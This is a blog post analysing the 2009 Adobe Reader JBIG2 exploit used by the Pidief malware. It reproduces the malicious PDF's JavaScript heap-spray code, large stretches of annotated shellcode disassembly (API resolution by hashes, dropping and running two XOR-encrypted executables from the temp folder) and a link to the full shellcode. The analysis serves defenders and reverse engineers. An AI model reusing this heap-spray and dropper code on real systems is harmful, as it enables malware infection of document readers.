getfile size shellcode
리버싱 2011. 5. 14. 12:32 |I want to present my results from my analysis of the Adobe PDF Exploit from March 2009. It allows to execute any Win32 code due to a bug in the jbig2 compression. The bug has currently (date 3rd March 2009) been fixed only internally, but Adobe wants to provide an update on March 11th. There are all Adobe Reader versions since 2007 vulnerable (Adobe Reader 7.0 and higher are affected). The percentage of exploiting PDFs that use this bug is very low, it is not wide spread.
Overview to the PDF file
So let's give an overview what an exploiting PDF file contains:
- JavaScript Code, making the exploit possible
- Shellcode integrated in the JavaScript Code (loading the stream)
- Exploit Code, a Stream in the PDF file containing the encrypted executable (malware)
- Fake PDF content, to hide it's malicious intention
There are the three main parts for exploiting a PDF: The JavaScript Code, the Shellcode and the Exploit Code. All are the same important for the exploit to work.
A famous well-known and wide spread virus family is Pidief (also the virus analysed here). In its history it used various exploits in Adobe PDFs to execute malware. Following analysis is forced to the actual version of Pidief. Enjoy!
JavaScript Code
Pidief contains at first JavaScript code, stored as script / java script object in the PDF file. The script is oct encoded and looks like:
2 0 obj <</S /JavaScript /JS (\040\012\012\040\040\040\040\040\040\040\040\146\165\156\143\164\151\157\156\040\160\162\151\156\164\111\156\146\157\050\051\173\012\040\040\040\040\040\040\040\040\040\040\040\040\143\157\156\163\157\154\145\056\160\162\151\156\164\154\156\050\042\126\151\145\167\145\162\040\154\141\156\147\165\141\147\145\072\040\042\040\053\040\141\160\160\056\154\141\156\147\165\141\147\145\051\073\012\040\040\040\040\040\040\040\040\040\040\040\040\143\157\156\163\157\154\145\056\160\162\151\156\164\154\156\050\042\126\151\145\167\145\162\040\166\1 ... >> endobj
The script is quite big, it is decrypted 42792 bytes long (but the main part of the script contains the Shellcode). Before showing the decrypted java code, I want briefly explain how JavaScript code is executed in PDFs. Adobe uses its own internal engine, so everyone who thinks IE: nope. JavaScript is executed on different actions (triggers). A german document from Adobe says there are 7 actions to execute JavaScript, here is the first one, Open Document, used. So this gives an important limitation, JavaScripts execution in PDF is dependent on actions. Following code registers the JavaScript to be executed when opening the document:
3 0 obj <</Type /Catalog /Outlines 4 0 R /Pages 5 0 R /OpenAction 2 0 R >> endobj
OpenAction defines to execute object reference 2 0 (compare with the above script object). The original JavaScript code (which is above oct encoded):
function printInfo(){ console.println("Viewer language: " + app.language); console.println("Viewer version: " + app.viewerVersion); console.println("Viewer Type: " + app.viewerType); console.println("Viewer Variatio: " + app.viewerVariation); console.println("Dumping all data objects in the document."); if ( this.external ) { console.println("viewing from a browser."); } else { console.println("viewing in the Acrobat application."); } ...
The script contains just two functions: printInfo() and sprayWindows(). The first one just outputs information about the PDF viewer (for debug only), the second one places the Shellcode into memory and prepares the memory. As previously mentioned, the script is 42794 bytes long, but just 150 lines long, which makes it easy to read. Interestingly the JavaScript code contains also comments:
// Create a 1MB string of NOP instructions followed by shellcode: // // malloc header string length NOP slide shellcode NULL terminator // 32 bytes 4 bytes x bytes y bytes 2 bytes while (pointers.length <= 0x100000/2) pointers += pointers; //Pointers pointers = pointers.substring(0, 0x100000/2 - 32/2 - 4/2 - pointers1.length - 2/2 ); while (nop.length <= 0x100000/2) nop += nop; //Trampolin nop = nop.substring(0, 0x100000/2 - 32/2 - 4/2 - jmp.length - 2/2); // while (nop1.length <= 0x100000/2) // nop1 += nop1; //shelcode <1M // nop1 = nop1.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2 );
How the Exploit works
Like always, the PDF exploit works by using (exploiting) a bug in the software (Adobe Reader). A common technique is for example the "Buffer Overflow", trying to overflow a buffer on stack and overwrite return jump addresses to point to data. This is also used here, in connection with a bug in jbig2 compression. The JavaScript code allocates 200 MB and fills it with NOPs (no operation, an assembly opcode) and the Shellcode. Later then there is a bug in jbig2 compression which leads to execute somewhere at in the 200 MB buffer. This is why there are so many NOPs, the exact entry point may differ so the NOPs will be executed up to the Shellcode. Here the code which allocates 200 MB:
var x = new Array(); // Fill 200MB of memory with copies of the NOP slide and shellcode for (i = 0; i < 150; i++) { x[i] = nop+shellcode; } // x[i++] = nop1+shellcode; for (; i < 201; i++) { x[i] = pointers + pointers1; }
It is very interesting that there is different code for Adobe Reader 9 and Adobe Reader 7.0 (and upper), to let the exploit working on different versions:
if(app.viewerVersion>=7.0&app.viewerVersion<9) {
Shellcode
The JavaScript code places the Shellcode in the memory in order to be executed by a bug in Adobe Reader. The Shellcode itself is valid Win32 code, stored JavaScript escaped in the JavaScript. Here we leave JavaScript engine, and enter Windows. In the first 4 bytes, the Shellcode contains an abbreviation "JBIA" which results in 4 valid but junk code instructions at the beginning. So lets remember and callback the target of the shellcode: To extract and execute the two executables from the PDF. Let's take a look at the initial code:
; [junk code] - "JBIA" 00000000 4A dec edx 00000001 42 inc edx 00000002 49 dec ecx 00000003 41 inc ecx ; create data on stack (284 bytes) 00000004 81EC20010000 sub esp,288 0000000A 8BFC mov edi,esp 0000000C 83C704 add edi,4 ; edi is a pointer to the new allocated data ; store the hashes of Windows API functions for later usage 0000000F C7073274910C mov dword [edi],0xc917432 ; LoadLibraryA 00000015 C747048E130AAC mov dword [edi+0x4],0xac0a138e ; GetFileSize 0000001C C7470839E27D83 mov dword [edi+0x8],0x837de239 ; GetTempPathA 00000023 C7470C8FF21861 mov dword [edi+0xc],0x6118f28f ; TerminateProcess 0000002A C747109332E494 mov dword [edi+0x10],0x94e43293 ; CreateFileA 00000031 C74714A932E494 mov dword [edi+0x14],0x94e432a9 ; CreateFileW 00000038 C7471843BEACDB mov dword [edi+0x18],0xdbacbe43 ; SetFilePointer 0000003F C7471CB2360F13 mov dword [edi+0x1c],0x130f36b2 ; ReadFile 00000046 C74720C48D1F74 mov dword [edi+0x20],0x741f8dc4 ; WriteFile 0000004D C74724512FA201 mov dword [edi+0x24],0x1a22f51 ; WinExec 00000054 C7472857660DFF mov dword [edi+0x28],0xff0d6657 ; CloseHandle 0000005B C7472C9B878BE5 mov dword [edi+0x2c],0xe58b879b ; GetCommandLineA 00000062 C74730EDAFFFB4 mov dword [edi+0x30],0xb4ffafed ; GetModuleFileNameA ; call the code following this instruction 00000069 E997020000 jmp dword Execute_Function .. Execute_Function: 00000305 E864FDFFFF call Execute_Shellcode ; just for obfuscation, this will never return
So what there is done is that function name hashes are stored on stack and an cheap obfuscation call is done. The jmp instruction jumps to a call which calls the code following the jmp instruction, so you could remove the jmp and call instruction and it would have the same effect. At the very beginning the code resolves its hashes to function addresses:
Execute_Shellcode: ; Arguments: ; edi = pointer to the data/code stored on stack 0000006E 64A130000000 mov eax,[fs:0x30] ; get a pointer to the Process Environment Block 00000074 8B400C mov eax,[eax+12] ; get a pointer to PEB_LDR_DATA structure 00000077 8B701C mov esi,[eax+28] ; -> PEB_LDR_DATA.InInitializationOrderModuleList.LDR_DATA_TABLE_ENTRY/LDR_MODULE (UNDOCUMENTED) 0000007A AD lodsd ; double linked list, Forward link, to LDR_DATA_TABLE_ENTRY / LDR_MODULE structure (UNDOCUMENTED) 0000007B 8B6808 mov ebp,[eax+8] ; DllBase (Module Base Address) (UNDOCUMENTED) ; resolve the 13 function hashes 0000007E 8BF7 mov esi,edi ; esi points to the first hash to resolve 00000080 6A0D push byte 13 ; loop 13 times 00000082 59 pop ecx ; ecx is counter Resolve_Hashes: 00000083 E838020000 call dword ResolveImportsByHashes 00000088 E2F9 loop Resolve_Hashes
ResolveImportsByHashes: ; resolves function hashes ; ebp = Module Address ; edi = pointer to hash to resolve and exchange with functions address ; store register contents 000002C0 51 push ecx 000002C1 56 push esi 000002C2 8B753C mov esi,[ebp+0x3C] ; -> PE Header (skip DOS Header) 000002C5 8B742E78 mov esi,[esi+ebp+0x78] ; Export Table Virtual Address 000002C9 03F5 add esi,ebp ; (absolute address) 000002CB 56 push esi ; store address of Export Directory Table 000002CC 8B7620 mov esi,[esi+0x20] ; Name Pointer RVA (list of all functions) 000002CF 03F5 add esi,ebp ; (absolute address) 000002D1 33C9 xor ecx,ecx 000002D3 49 dec ecx ; ecx is name counter Function_Name_loop: 000002D4 41 inc ecx ; -> next function name 000002D5 AD lodsd ; get the address of the function name 000002D6 03C5 add eax,ebp ; (absolute address) 000002D8 33DB xor ebx,ebx ; reset next hash to generate Generate_Hash_of_Function_Name: 000002DA 0FBE10 movsx edx,byte [eax] ; load next character 000002DD 3AD6 cmp dl,dh ; zero terminator? 000002DF 7408 jz Generated_Hash 000002E1 C1CB07 ror ebx,7 ; => this is hash generating algorithm hash += char >> 7 000002E4 03DA add ebx,edx ; (add the shifted character to generating hash) 000002E6 40 inc eax ; -> next character 000002E7 EBF1 jmp short Generate_Hash_of_Function_Name Generated_Hash: 000002E9 3B1F cmp ebx,[edi] ; matches the input hash with generated one? 000002EB 75E7 jnz Function_Name_loop ; if not compare against next function 000002ED 5E pop esi ; restore address of Export Directory Table 000002EE 8B5E24 mov ebx,[esi+0x24] ; Ordinal Table 000002F1 03DD add ebx,ebp ; (absolute address) 000002F3 668B0C4B mov cx,[ebx+ecx*2] ; look up the function in the Ordinal Table to get the ordinal number 000002F7 8B5E1C mov ebx,[esi+0x1c] ; Export Address Table 000002FA 03DD add ebx,ebp ; (absolute address) 000002FC 8B048B mov eax,[ebx+ecx*4] ; -> look up the Address of the function (ordinal number in EAT) 000002FF 03C5 add eax,ebp ; (absolute address) 00000301 AB stosd ; overwrite the input hash with the address ; restore register contents 00000302 5E pop esi 00000303 59 pop ecx 00000304 C3 ret
There is the typical ResolveImportsByHashes function that is part of every malware - compare it with Sinowal. And like every resolve function this function uses a ror 7 to generate the hash (very typical). The rest of the code is not that exciting, just standard API calls. Like on Sinowal Analysis I do not want to spam around with code, so following is the list of calls:
Kernel32!GetFileSize(FileHandle +4, NULL); done in a loop, in order to get the size of every file and compare it with fixed PDF file size to get the file handle of the pdf file Kernel32!GetTempPathA(Stack Buffer, 256 bytes); returns temp path, where the 2 executables will be stored to appending "\SVCHOST.EXE" to the temp path Kernel32!CreateFileA("C:\Windows\Temp\SVCHOST.EXE", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); creates the first file in the temp path Kernel32!SetFilePointer(PDF File Handle, File Position = where the string is, NULL, FILE_BEGIN); sets file pointer in PDF file to a special configuration block Kernel32!ReadFile(PDF File Handle, Buffer, 48 Bytes, &NumberOfBytesRead, NULL); reads the configuration block (30h bytes) Kernel32!SetFilePointer(PDF File Handle, File Position, NULL, FILE_BEGIN); sets the file pointer to the position of the to-extract file in the PDF file, received from the configuration block Kernel32!ReadFile(PDF File Handle, Buffer, 1024 Bytes, &NumberOfBytesRead, NULL); Kernel32!WriteFile(PDF File Handle, Read File Buffer, 1024 Bytes, &NumberOfBytesWritten, NULL); both done in a loop to read the whole first file directly after read the file (buffer) will be decrypted with xor 97h Kernel32!CloseHandle(Created File); Kernel32!WinExec(Created File Name, 0); the malware will be executed strcat(Temp Path, "\temp.exe"); second files name is temp.exe Kernel32!CreateFileA(Second File Name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); also created in the temp directory Kernel32!SetFilePointer(PDF File Handle, File Position = somewhere in the file, NULL, FILE_BEGIN); at this time the file position is hard wired coded Kernel32!ReadFile(PDF File Handle, Buffer, 1024 Bytes, &NumberOfBytesRead, NULL); Kernel32!WriteFile(PDF File Handle, Read File Buffer, 1024 Bytes, &NumberOfBytesWritten, NULL); again both done in a loop to read the whole second file directly after read the file (buffer) will be decrypted with at this time xor A0h Kernel32!SetFilePointer(Created File Handle, File Position = 9000h, NULL, FILE_BEGIN); the file pointer of the second file will be moved to that position Kernel32!WriteFile(PDF File Handle, previously read configuration buffer, 40 Bytes, &NumberOfBytesWritten, NULL); and the configuration block written Kernel32!CloseHandle(Created File); Kernel32!WinExec(Created Second File Name, 0); also this file will be executed Kernel32!CloseHandle(Created File); ** programming error with this call making the process crashing Kernel32!TerminateProcess(Current Process, Exit Code = 0); will never be executed but should smoothly terminate Adobe Reader ...and that's it!
Configuration Block
As mentioned, the PDF file contains a configuration block which is 40 bytes big. The shellcode uses two variables of it, where the first file lays at in the PDF and how long it is. Furthermore the configuration block will be copied into the second file. The configuration block is hard wired at position 171984 in the pdf file and contains following bytes:
00029FD0 41 41 49 20 41 4D 4F 53 20 31 31 2D 30 32 2D 30 AAI AMOS 11-02-0 00029FE0 39 2E 70 64 66 00 00 74 00 78 78 78 78 78 78 78 9.pdf..t.xxxxxxx 00029FF0 78 78 78 78 78 78 78 78 C8 B0 04 00 FC 47 03 00 xxxxxxxxÈ°..üG..
The next to last dword, 0004B0C8, is the target primary file size (307400 bytes). The last dword 000347FC is the position of the file within the pdf file, but 0x2a000 and 0xb000 are added at runtime to get the position.
Programming Errors in Pidief
I encountered various bugs in the Shellcode of Pidief:
- Address 6Eh: direct access to structures Process Environment Block, LDR Data; they are subjected to change and different in Windows XP, Server 2003 and Vista, undefined behaviour
- Address BBh: loop condition will result into endless loop if PDF file size != 827116, forcing the system to crash
- Address C0h: Only 256 bytes are allocated for the file name, but Windows defines MAX_PATH as 260, 4 ("C:\", 0) + 256 (file name), this could lead in undefined behaviour and system crash if PDF file name is > 260 characters long
- Address 2B7h: GetFileSize is called instead of GetCurrentProcess, THIS IN FACT CRASHES YOUR ADOBE READER
- Address 2E7h, function ResolveImportsByHashes: endless loop if the searched function does not exist in the dll, undefined behaviour
Also the code is not very effective and could have been written better. And it contains junk instructions and redundant code.
Affected Systems
All Windows XP with Adobe Reader 7.0 or higher before March 11 2009 date are affected. March 11 because that's the day when Adobe Systems wants to release a security fix for Adobe Reader. Furthermore JavaScript must be enabled in Adobe Reader (which is per default activated). In the link below Adobe Systems tells how to deactivate it in the preferences.
I can not currently say if Vista is affected too, I'm not sure until the Process Environment Block and LDR data structures are used which heavily change from Windows to Windows versions. Also its not said what the malware executables do and how they are Vista compatible, I'll review it later.
Downloads
Download the Pidief Shellcode under http://web17.webbpro.de/downloads/PDF Exploit Article/Shellcode.asm. The terms of use apply for the provided code. For any other information or file wanted please send me a request.
Conclusion
PDF Exploits are quite nice, but also difficult to find. As virus writer you would need to take a very close look to Adobe Reader to find one, but if found, it is worth a few thousand euro (up to 10.000 € on the market). Remember as end-user to keep your Adobe Reader always updated (use the latest version) and turn automatic updates on.